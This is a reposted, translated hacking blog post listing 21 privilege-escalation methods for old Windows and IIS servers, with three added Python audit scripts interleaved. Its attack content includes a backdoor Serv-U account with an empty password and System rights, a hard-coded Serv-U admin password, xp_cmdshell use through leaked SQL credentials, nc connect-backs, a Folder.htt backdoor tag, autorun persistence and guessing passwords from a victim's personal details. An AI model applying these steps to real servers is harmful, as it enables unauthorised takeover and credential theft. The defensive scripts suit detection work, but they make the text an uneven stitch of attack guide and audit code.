21 Methods of Privilege Escalation

xiaoxiao 2021-03-06

Author: Nah

Source: http://blog.77169.com/more.asp?name=atan19a&id=6866

Everything below is a summary from my time working on privilege escalation. Many of the methods did not work for me, but I have seen others succeed with them. Apart from the first method, which I researched myself, the rest are summarized from other people's experience. I hope it helps my friends!

1. Radmin connection method

The prerequisite is that your permissions are already high enough and the target has no firewall. Package Radmin into an installer, run it on the target so that it opens its port, then connect with Radmin. I have done this successfully; the port was opened on the target side.

2. pcAnywhere

C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ holds the CIF files. Take them, install pcAnywhere locally and use them there.

3. SAM cracking

C:\Winnt\System32\Config\SAM: take the SAM file and crack it.

4. Serv-U password capture

Quote: Look in C:\Documents and Settings\All Users\"Start" Menu\Programs\ for the Serv-U shortcut, then view its properties locally to learn the install path; check whether that path is readable and whether you can traverse into it.

Once in, if you have permission to modify ServUDaemon.ini, add a user with an empty password:

[USER=wekwen|1]

Password=

HomeDir=C:\

TimeOut=600

Maintenance=System

Access1=C:\|RWAMELCDP

Access2=D:\|RWAMELCDP

Access3=F:\|RWAMELCDP

SKEYValues=

This user has the highest privilege level; you can then FTP in and use quote site exec xxx to elevate.
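As an added defensive check, not part of the original article, the Python script below audits a ServUDaemon.ini for exactly the kind of account shown above: an empty password, Maintenance=System, a home directory at a drive root, and full rights on drive roots. The ini text is a constructed sample (the user from the fragment above plus one ordinary user); the section and key layout ([USER=name|1] with Password, HomeDir, Maintenance and AccessN keys) is taken from that fragment, and the "tt..." hash in the sample is a made-up value.

```python
import configparser
import re

# Constructed sample ServUDaemon.ini: the backdoor user from the article
# plus one ordinary, properly scoped user. Not taken from any real server.
SAMPLE_INI = """
[GLOBAL]
Version=4.0.0.4

[USER=wekwen|1]
Password=
HomeDir=C:\\
TimeOut=600
Maintenance=System
Access1=C:\\|RWAMELCDP
Access2=D:\\|RWAMELCDP
Access3=F:\\|RWAMELCDP
SKEYValues=

[USER=webdev|1]
Password=ttA1B2C3D4E5F60718293A4B5C6D7E8F90
HomeDir=D:\\www\\site1
TimeOut=600
Access1=D:\\www\\site1|RWAMLCD
"""

# A path is a drive root if it is just a drive letter, with or without a trailing backslash.
DRIVE_ROOT = re.compile(r"^[A-Za-z]:\\?$")
# The full rights string used in the article's fragment.
FULL_RIGHTS = set("RWAMELCDP")


def parse_users(ini_text):
    """Return {username: {key: value}} for every [USER=name|N] section."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep key case exactly as written in the file
    cp.read_string(ini_text)
    users = {}
    for section in cp.sections():
        if section.upper().startswith("USER="):
            name = section[len("USER="):].split("|")[0]
            users[name] = dict(cp[section])
    return users


def audit_servu_ini(ini_text):
    """Return a list of (username, finding) tuples for risky account settings."""
    findings = []
    for name, keys in parse_users(ini_text).items():
        if keys.get("Password", "").strip() == "":
            findings.append((name, "empty password"))
        if keys.get("Maintenance", "").strip().lower() == "system":
            findings.append((name, "Maintenance=System grants server administration"))
        if DRIVE_ROOT.match(keys.get("HomeDir", "").strip()):
            findings.append((name, "home directory is a drive root"))
        for key, value in keys.items():
            if not key.lower().startswith("access"):
                continue
            path, _, rights = value.partition("|")
            if DRIVE_ROOT.match(path.strip()) and FULL_RIGHTS <= set(rights.strip().upper()):
                findings.append((name, "full rights on drive root " + path.strip()))
    return findings


if __name__ == "__main__":
    for user, finding in audit_servu_ini(SAMPLE_INI):
        print(f"{user}: {finding}")
```

Run it against the real ServUDaemon.ini of a server you administer; any account that shows more than one of these findings at once is the pattern this section describes and should be removed or re-scoped.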

5. C:\Winnt\System32\inetsrv\Data\

Quote: This directory is likewise Full Control for everyone. All we need to do is upload a privilege escalation tool there and then execute it.

6. Serv-U overflow

There are plenty of tutorials for this online, so it is not explained in detail here.

7. Running cscript

Quote: Run "cscript C:\inetpub\adminscripts\adsutil.vbs get w3svc/InProcessIsapiApps"

Explanation:

Running cscript c:\inetpub\adminscripts\adsutil.vbs get w3svc/InProcessIsapiApps lists the DLLs that run in-process with elevated privilege: idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll.

Now add asp.dll to that privileged list. asp.dll is located at c:\winnt\system32\inetsrv\asp.dll (the location is not necessarily the same on every machine). Run:

cscript adsutil.vbs set /w3svc/InProcessIsapiApps "C:\Winnt\System32\idq.dll" "C:\winnt\system32\inetsrv\httpext.dll" "c:\winnt\system32\inetsrv\httpodbc.dll" "C:\winnt\system32\inetsrv\ssinc.dll" "c:\winnt\system32\msw3prt.dll" "C:\Winnt\System32\inetsrv\asp.dll"

You can then use cscript adsutil.vbs get /w3svc/InProcessIsapiApps to check whether it was added.

8. Startup-folder scripts

Write a BAT or VBS file into C:\Documents and Settings\All Users\"Start" Menu\Programs\Startup.

9. VNC

This one is from Xiaohua's article, hoho.

By default the VNC password is stored at HKCU\Software\ORL\WinVNC3\Password.

We can crack it with vncx4. vncx4 is very simple: at the command line enter

C:\> vncx4 -w

then type in each hexadecimal byte of the value above; press Enter and it is done.

10. nc privilege escalation

Upload nc to the target; the condition is that you have permission to run it. Then have it connect back to your own machine, hoho, OK.

11. Guest-level social engineering

Very simple: look at his support and contact information, get hold of an account, then guess the password from it as much as you can; perhaps the user's password is the same as his QQ or mail password.

Also try his mobile phone number as much as possible, hoho.

12. IPC$ null session

If the target is really an idiot, IPC$ with a null or weak password will do.

13. Service replacement

Do I even need to explain this one? Personally I find it rather complex.

14. Autorun.inf

autorun=xxx.exe: write your file after the = sign, give the file the read-only, system and hidden attributes, and put it on whichever drive you like. Don't believe he won't run it.

15. Desktop.ini with Folder.htt

Quote: First, create a folder locally (the name does not matter), open it, right-click on an empty spot and choose "Customize This Folder" (XP does not seem to allow this), and accept the defaults all the way through. When it finishes you will see two more items in the directory: a "Folder Settings" directory and a Desktop.ini file (if you cannot see them, turn off "Hide protected operating system files"). Then open the Folder.htt file from the Folder Settings directory in Notepad and add the following code anywhere:

<object id="runit" width=0 height=0 type="application/x-oleobject" codebase="your backdoor file name">

Then put your backdoor file in the Folder Settings directory and upload that directory together with Desktop.ini into any directory on the target. As soon as the administrator browses that directory, our backdoor runs.
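Sections 8, 14 and 15 describe three file-based persistence spots: a script dropped into the Startup folder, an autorun.inf that launches a program, and a Desktop.ini that hands the folder view to a Folder.htt carrying an object tag. As an added defensive example that is not from the original article, the Python script below walks a directory tree and flags all three. It builds its own throwaway fixture in a temporary directory (constructed files, no real malware) so it runs anywhere; on a real host you would point scan_tree at a drive root. The sample file contents, including the PersistMoniker line in the sample Desktop.ini, are assumptions made for the demo.

```python
import os
import re
import shutil
import tempfile

# Extensions worth a look when found directly inside a Startup folder (section 8).
STARTUP_SCRIPT_EXT = {".bat", ".cmd", ".vbs", ".js", ".wsf", ".exe", ".scr", ".pif"}
# autorun.inf keys that launch a program (section 14).
AUTORUN_LAUNCH = re.compile(r"^\s*(open|shellexecute)\s*=", re.IGNORECASE | re.MULTILINE)
# Desktop.ini handing the folder view to a .htt template (section 15).
DESKTOP_INI_HTT = re.compile(r"^\s*PersistMoniker\s*=.*\.htt", re.IGNORECASE | re.MULTILINE)
# An <object> tag with a codebase= attribute inside a .htt template (section 15).
HTT_OBJECT_CODEBASE = re.compile(r"<object\b[^>]*\bcodebase\s*=", re.IGNORECASE | re.DOTALL)


def read_text(path):
    """Read a small text file leniently; these artefacts are ANSI or UTF-8 text."""
    with open(path, "r", encoding="utf-8", errors="ignore") as fh:
        return fh.read()


def scan_tree(root):
    """Walk root and return (kind, path) for each persistence artefact found."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        in_startup = os.path.basename(dirpath).lower() == "startup"
        for name in filenames:
            path = os.path.join(dirpath, name)
            lower = name.lower()
            ext = os.path.splitext(lower)[1]
            if in_startup and ext in STARTUP_SCRIPT_EXT:
                findings.append(("startup-script", path))
            elif lower == "autorun.inf" and AUTORUN_LAUNCH.search(read_text(path)):
                findings.append(("autorun-inf", path))
            elif lower == "desktop.ini" and DESKTOP_INI_HTT.search(read_text(path)):
                findings.append(("desktop-ini-htt", path))
            elif ext == ".htt" and HTT_OBJECT_CODEBASE.search(read_text(path)):
                findings.append(("folder-htt-object", path))
    return findings


def build_fixture():
    """Create a constructed directory tree with the three artefacts plus benign files."""
    root = tempfile.mkdtemp(prefix="persist_demo_")

    def put(relpath, content):
        full = os.path.join(root, *relpath.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)

    startup = "Documents and Settings/All Users/Start Menu/Programs/Startup/"
    put(startup + "update.vbs", 'Set sh = CreateObject("WScript.Shell")\r\n')  # section 8
    put(startup + "readme.txt", "benign note\r\n")
    put("autorun.inf", "[autorun]\r\nopen=xxx.exe\r\n")  # section 14
    put("share/Desktop.ini",
        "[ExtShellFolderViews]\r\nPersistMoniker=file://Folder Settings\\Folder.htt\r\n")  # section 15
    put("share/Folder Settings/Folder.htt",
        '<html><body><object id="runit" width=0 height=0 '
        'type="application/x-oleobject" codebase="backdoor.exe"></object></body></html>')
    put("share/Folder Settings/plain.htt", "<html><body>default template</body></html>")
    return root


def demo():
    """Build the fixture, scan it, clean up, and return the sorted finding kinds."""
    root = build_fixture()
    try:
        return sorted(kind for kind, _ in scan_tree(root))
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    print(demo())
```

The scan only reads file names and a few text patterns, so it is cheap enough to run across a whole drive; anything it flags in a world-writable share or in All Users\Start Menu\Programs\Startup deserves a manual look.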

16. Serv-U config overwrite

Install Serv-U locally, overwrite your own ServUDaemon.ini with the ServUDaemon.ini downloaded from him, and restart Serv-U; all of the configuration is then identical to his.

17. Serv-U port forwarding

43958 is Serv-U's local administration port. Upload fpipe.exe and run: fpipe -v -l 3333 -r 43958 127.0.0.1, which forwards the listening port to port 43958 (the original says port 4444 here, while the command listens on 3333). Then install Serv-U locally, create a new server, enter the target's IP, and connect with the account LocalAdministrator and the password #1@'Ak#.1k; 0 @p; you can then administer his Serv-U.

18. SQL account password leakage

If the target runs an MSSQL server, we can use the SQL connection account (you can find it in the ASP files that connect to the database) to add an administrator account, because MSSQL runs with System permission by default.

Quote: If the target has not removed xp_cmdshell: use SQLExec.exe, fill in the target IP in the Host field and the username and password you obtained in the User and Pass fields, with the format select xp_cmdshell "%s". Then click Connect and you are in; enter the CMD command you want in the CMD field.

19. asp.dll

Quote: asp.dll is placed at c:\winnt\system32\inetsrv\asp.dll (the location is not necessarily the same on every machine).

We now add it with:

cscript adsutil.vbs set /w3svc/InProcessIsapiApps "C:\Winnt\System32\idq.dll" "C:\winnt\system32\inetsrv\httpext.dll" "c:\winnt\system32\inetsrv\httpodbc.dll" "C:\winnt\system32\inetsrv\ssinc.dll" "c:\winnt\system32\msw3prt.dll" "C:\Winnt\System32\inetsrv\asp.dll"

OK, now you can use cscript adsutil.vbs get /w3svc/InProcessIsapiApps to see whether it was added. Note the usage of get and set: one views the list, the other sets it. Also, you need to be in the C:\inetpub\adminscripts> directory when you run the commands above.

So if you are an administrator and your machine has been hit with this trick to raise ASP to System privilege, the defence is to take asp.dll back out of the privileged list: use the same set command and overwrite what was just written with a list that does not include asp.dll.
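Sections 7 and 19 both revolve around the InProcessIsapiApps list: anything on it runs inside the web service process with its privilege, so a defender's check is to compare the current list against the five DLLs the article gives as the default set and flag anything else, asp.dll included. The Python below is an added example, not code from the original article. It parses a constructed sample of the output of the adsutil.vbs get command (the exact output layout is an assumption; the parser only relies on each path being enclosed in double quotes) and builds the corrective set command line that section 19 describes, with the unexpected entry removed.

```python
import ntpath
import re

# The in-process ISAPI DLLs that sections 7 and 19 list as the default set.
EXPECTED_INPROCESS = {"idq.dll", "httpext.dll", "httpodbc.dll", "ssinc.dll", "msw3prt.dll"}

# Constructed sample of what "cscript adsutil.vbs get w3svc/InProcessIsapiApps"
# might print after asp.dll has been added. The layout is an assumption; the
# parser only depends on each path being enclosed in double quotes.
SAMPLE_ADSUTIL_OUTPUT = """\
InProcessIsapiApps              : (LIST) (6 Items)
  "C:\\Winnt\\System32\\idq.dll"
  "C:\\winnt\\system32\\inetsrv\\httpext.dll"
  "c:\\winnt\\system32\\inetsrv\\httpodbc.dll"
  "C:\\winnt\\system32\\inetsrv\\ssinc.dll"
  "c:\\winnt\\system32\\msw3prt.dll"
  "C:\\Winnt\\System32\\inetsrv\\asp.dll"
"""

QUOTED = re.compile(r'"([^"]+)"')


def parse_inprocess_list(output):
    """Extract every double-quoted path from adsutil get output, in order."""
    return QUOTED.findall(output)


def unexpected_entries(paths, expected=EXPECTED_INPROCESS):
    """Return the paths whose file name is not in the expected default set."""
    return [p for p in paths if ntpath.basename(p).lower() not in expected]


def build_set_command(paths, remove):
    """Build the adsutil.vbs SET line that rewrites the list without the flagged entries."""
    drop = set(remove)
    keep = [p for p in paths if p not in drop]
    quoted = " ".join(f'"{p}"' for p in keep)
    return f"cscript adsutil.vbs SET /W3SVC/InProcessIsapiApps {quoted}"


def audit(output):
    """Return (flagged_paths, remediation_command) for one adsutil get output."""
    paths = parse_inprocess_list(output)
    flagged = unexpected_entries(paths)
    return flagged, build_set_command(paths, flagged)


if __name__ == "__main__":
    flagged, fix = audit(SAMPLE_ADSUTIL_OUTPUT)
    for p in flagged:
        print("unexpected in-process ISAPI DLL:", p)
    print("remediation (run from C:\\inetpub\\adminscripts):", fix)
```

Feed it the real output of the get command from a server you administer; an empty flagged list means the in-process set is still the default, and a non-empty one gives you the exact set line to restore it.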

20. Magic Winmail

The prerequisite is that you already have a webshell. Reference:

http://www.eviloctal.com/forum/read.php?tid=3587

21. DBO ...

In the end, how you go about elevating privileges depends on how each person uses these; hoho, keep at it, and take control of the server in the end!

Please credit the original address when reposting: https://www.9cbs.com/read-46625.html
